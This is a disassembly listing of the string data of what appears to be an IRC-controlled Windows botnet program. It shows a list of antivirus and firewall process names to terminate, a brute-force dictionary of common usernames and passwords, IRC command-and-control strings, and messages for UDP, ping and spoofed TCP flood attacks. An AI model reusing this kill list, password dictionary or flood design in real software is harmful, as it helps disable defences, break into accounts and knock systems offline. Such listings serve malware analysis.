aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:0042B754�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:0042B750�o
align 10h
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:0042B74C�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:0042B748�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:0042B744�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:0042B740�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:0042B73C�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:0042B738�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:0042B734�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:0042B730�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:0042B72C�o
align 10h
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:0042B728�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:0042B724�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:0042B720�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:0042B71C�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:0042B718�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:0042B714�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:0042B710�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:0042B70C�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:0042B708�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:0042B704�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:0042B700�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:0042B6FC�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:0042B6F8�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:0042B6F4�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:0042B6F0�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:0042B6EC�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:0042B6E8�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:0042B6E4�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:0042B6E0�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:0042B6DC�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:0042B6D8�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:0042B6D4�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:0042B6D0�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:0042B6CC�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:0042B6C8�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:0042B6C4�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:0042B6C0�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:0042B6BC�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:0042B6B8�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:0042B6B4�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:0042B6B0�o
align 10h
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:0042B6AC�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:0042B6A8�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:0042B6A4�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:0042B6A0�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:0042B69C�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:0042B698�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:0042B690�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:0042B68C�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:0042B688�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:0042B684�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:0042B680�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:0042B67C�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:0042B678�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:0042B674�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:0042B670�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:0042B66C�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:0042B668�o
align 10h
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:0042B664�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:0042B660�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:0042B65C�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:0042B658�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:0042B654�o
align 10h
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:0042B650�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:0042B64C�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:0042B648�o
; .data:0042B694�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:0042B644�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:0042B640�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:0042B638�o
; .data:0042B63C�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:0042B634�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:0042B630�o
align 10h
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:0042B62C�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:0042B628�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:0042B624�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:0042B620�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:0042B61C�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:0042B618�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:0042B614�o
align 10h
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:0042B610�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:0042B60C�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:0042B608�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:0042B604�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:0042B600�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:0042B5FC�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:0042B5F8�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:0042B5F4�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:0042B5F0�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:0042B5EC�o
align 10h
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:0042B5E8�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:0042B5E4�o
align 10h
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:0042B5E0�o
align 10h
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:0042B5DC�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:0042B5D8�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:0042B5D4�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:0042B5D0�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:0042B5CC�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:0042B5C8�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0042B5C0�o
; .data:0042B5C4�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:0042B5BC�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:0042B5B8�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:0042B5B4�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:0042B5AC�o
; .data:0042B5B0�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:0042B5A8�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:0042B5A4�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:0042B5A0�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:0042B59C�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:0042B598�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:0042B590�o
; .data:0042B594�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:0042B58C�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:0042B588�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:0042B584�o
align 10h
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:0042B580�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:0042B57C�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:0042B578�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:0042B574�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:0042B570�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:0042B56C�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:0042B568�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:0042B564�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:0042B560�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:0042B55C�o
align 10h
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:0042B558�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:0042B554�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:0042B550�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:0042B54C�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:0042B548�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:0042B544�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:0042B540�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:0042B53C�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:0042B538�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:0042B534�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:0042B530�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:0042B52C�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:0042B528�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:0042B524�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:0042B51C�o
; .data:0042B520�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:0042B518�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:0042B514�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:0042B510�o
align 10h
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:0042B50C�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:0042B508�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:0042B504�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:0042B500�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:0042B4FC�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:0042B4F8�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:0042B4F4�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:0042B4F0�o
align 10h
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:0042B4EC�o
align 10h
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:0042B4E8�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:0042B4E4�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:0042B4E0�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:0042B4DC�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:0042B4D8�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:0042B4D4�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .data:off_42B4D0�o
align 4
aCannotExtractP db 'Cannot extract process path for %s',0Ah,0 ; DATA XREF: sub_408206+2D7�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0Ah,0 ; DATA XREF: sub_408206+2C9�o
align 10h
aCouldNotDelete db 'Could not delete ',27h,'%s',27h,'.!',0Ah,0 ; DATA XREF: sub_408206+2BB�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_408206+187�o
align 4
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_408519:loc_40859A�o
align 4
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_408519+7A�o
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_408519+2A�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0042C2E4�o
align 10h
aLan db 'lan',0 ; DATA XREF: .data:0042C2DC�o
aMain db 'main',0 ; DATA XREF: .data:0042C2D8�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:0042C2D4�o
aBlank db 'blank',0 ; DATA XREF: .data:0042C2D0�o
align 4
aOffice db 'office',0 ; DATA XREF: .data:0042C2CC�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0042C2C8�o
aXp db 'xp',0 ; DATA XREF: .data:0042C2C4�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .data:0042C2C0�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:0042C2BC�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:0042C2B8�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0042C2B4�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:0042C2B0�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:0042C2AC�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0042C2A8�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0042C2A0�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0042C29C�o
align 10h
aSql db 'sql',0 ; DATA XREF: .data:0042C298�o
aSa db 'sa',0 ; DATA XREF: sub_408A18+1897�o
; .text:00413D62�o ...
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:0042C290�o
align 10h
aDb1 db 'db1',0 ; DATA XREF: .data:0042C288�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0042C284�o
align 4
aData db 'data',0 ; DATA XREF: .data:0042C280�o
align 10h
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0042C27C�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0042C278�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:0042C274�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0042C270�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0042C268�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0042C264�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0042C260�o
align 10h
aHello db 'hello',0 ; DATA XREF: .data:0042C25C�o
align 4
aHell_0 db 'hell',0 ; DATA XREF: .data:0042C258�o
align 10h
aGod db 'god',0 ; DATA XREF: .data:0042C254�o
aSex db 'sex',0 ; DATA XREF: .data:0042C250�o
aSlut db 'slut',0 ; DATA XREF: .data:0042C24C�o
align 10h
aBitch db 'bitch',0 ; DATA XREF: .data:0042C248�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0042C244�o
align 10h
aExchange db 'exchange',0 ; DATA XREF: .data:0042C240�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:0042C23C�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0042C238�o
align 10h
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0042C234�o
align 4
aLogin db 'login',0 ; DATA XREF: sub_408A18+7B8�o
; .data:0042C230�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0042C22C�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:0042C228�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0042C220�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0042C21C�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0042C218�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:0042C214�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0042C210�o
aNeil db 'neil',0 ; DATA XREF: .data:0042C20C�o
align 10h
aLee db 'lee',0 ; DATA XREF: .data:0042C208�o
aBrian db 'brian',0 ; DATA XREF: .data:0042C204�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:0042C1FC�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:0042C1F8�o
aSam db 'sam',0 ; DATA XREF: .data:0042C1F4�o
aLuke db 'luke',0 ; DATA XREF: .data:0042C1F0�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0042C1EC�o
; .data:0042C200�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0042C1E8�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042C1E4�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0042C1E0�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:0042C1DC�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0042C1D8�o
aJen db 'jen',0 ; DATA XREF: .data:0042C1D4�o
aBob db 'bob',0 ; DATA XREF: .data:0042C1D0�o
; .data:0042C224�o
aQwe db 'qwe',0 ; DATA XREF: .data:0042C1CC�o
aZxc db 'zxc',0 ; DATA XREF: .data:0042C1C8�o
aAsd db 'asd',0 ; DATA XREF: .data:0042C1C4�o
aQaz db 'qaz',0 ; DATA XREF: .data:0042C1C0�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0042C1BC�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0042C1B8�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042C1B4�o
align 10h
aWin2k db 'win2k',0 ; DATA XREF: .data:0042C1B0�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:0042C1AC�o
align 10h
aWindows db 'windows',0 ; DATA XREF: .data:0042C1A8�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042C1A4�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:0042C1A0�o
aOem db 'oem',0 ; DATA XREF: .data:0042C19C�o
aUser db 'user',0 ; DATA XREF: sub_408A18+1D62�o
; .data:0042C198�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0042C194�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0042C190�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:0042C18C�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0042C188�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0042C184�o
; .data:0042C2E0�o
align 10h
aWww db 'www',0 ; DATA XREF: .data:0042C180�o
aWeb db 'web',0 ; DATA XREF: .data:0042C17C�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0042C178�o
aMail db 'mail',0 ; DATA XREF: .data:0042C174�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0042C170�o
align 10h
aNull_0 db 'null',0 ; DATA XREF: .data:0042C16C�o
align 4
aServer db 'server',0 ; DATA XREF: sub_408A18+1A25�o
; .data:0042C164�o
align 10h
aSystem db 'system',0 ; DATA XREF: .data:0042C160�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0042C158�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0042C154�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:0042C150�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0042C14C�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0042C148�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0042C140�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:0042C13C�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41175C+98�o
; .data:0042C138�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:0042C134�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0042C130�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:0042C12C�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0042C128�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:0042C124�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .data:0042C120�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0042C11C�o
a123456 db '123456',0 ; DATA XREF: .data:0042C118�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042C114�o
align 10h
a1234 db '1234',0 ; DATA XREF: .data:0042C110�o
align 4
a123 db '123',0 ; DATA XREF: .data:0042C10C�o
a12 db '12',0 ; DATA XREF: .data:0042C108�o
align 10h
a1: ; DATA XREF: .data:0042C104�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:0042C100�o
aPwd db 'pwd',0 ; DATA XREF: .data:0042C0FC�o
aPass_0 db 'pass',0 ; DATA XREF: .data:0042C0F8�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042C0F4�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .data:0042C0F0�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0042C0EC�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0042C0E8�o
align 10h
aAdm db 'adm',0 ; DATA XREF: .data:0042C0E4�o
aDb2 db 'db2',0 ; DATA XREF: .data:0042C0C0�o
; .data:0042C28C�o
aOracle db 'oracle',0 ; DATA XREF: .data:0042C0BC�o
; .data:0042C2A4�o
align 10h
aDba db 'dba',0 ; DATA XREF: .data:0042C0B8�o
aDatabase db 'database',0 ; DATA XREF: .data:0042C0B4�o
; .data:0042C26C�o
align 10h
aDefault db 'default',0 ; DATA XREF: .data:0042C0B0�o
; .data:0042C15C�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:0042C0AC�o
; .data:0042C144�o
align 10h
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0042C0A8�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:0042C0A4�o
; .data:0042C2EC�o
aStudent db 'student',0 ; DATA XREF: .data:0042C0A0�o
; .data:0042C2E8�o
aOwner db 'owner',0 ; DATA XREF: .data:0042C09C�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0042C098�o
align 10h
aRoot db 'root',0 ; DATA XREF: .text:00413D69�o
; .data:0042C094�o ...
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0042C090�o
; .data:0042C2F0�o
align 10h
aAdmin db 'admin',0 ; DATA XREF: .text:00413D70�o
; .data:0042C08C�o ...
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:0042C088�o
; .data:0042C0DC�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .data:0042C084�o
; .data:0042C0D8�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042C080�o
; .data:0042C0D4�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0042C07C�o
; .data:0042C0D0�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:off_42C078�o
; .data:0042C0CC�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_42BFB4�o
align 4
a@celestial_org db '*@celestial.org',0 ; DATA XREF: .data:off_42BFB0�o
asc_425A4C: ; DATA XREF: sub_40863D+129�o
; sub_40863D+1AD�o
unicode 0, <|>,0
asc_425A50 db ' :',0 ; DATA XREF: sub_40863D:loc_40871D�o
; sub_408A18+7D�o ...
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40863D+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40863D+38�o
align 4
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_4088B9+9F�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+5CFD�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+5CE8�o
align 4
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_408A18+5CD4�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_408A18+5CB7�o
align 10h
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_408A18+5C3F�o
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_408A18+5C1C�o
align 10h
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_408A18+5BD8�o
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_408A18+5BC9�o
; sub_408A18+5C30�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_408A18+5BB5�o
align 4
asc_425BBC: ; DATA XREF: sub_408A18+5B63�o
unicode 0, <~>,0
dword_425BC0 dd 0 aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_408A18+5B13�o
align 4
aScanFailedTo_2 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_408A18+58C5�o
align 4
aStoppingPrevio db 'Stopping previous scans',0 ; DATA XREF: sub_408A18+588A�o
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+567C�o
align 10h
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_408A18+5617�o
db 0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_408A18+554E�o
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+5524�o
align 10h
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_408A18+54C9�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_408A18:loc_40DE1D�o
align 4
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_408A18+53E9�o
align 4
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_408A18+5385�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_408A18+5373�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_408A18+536C�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_408A18+5293�o
align 4
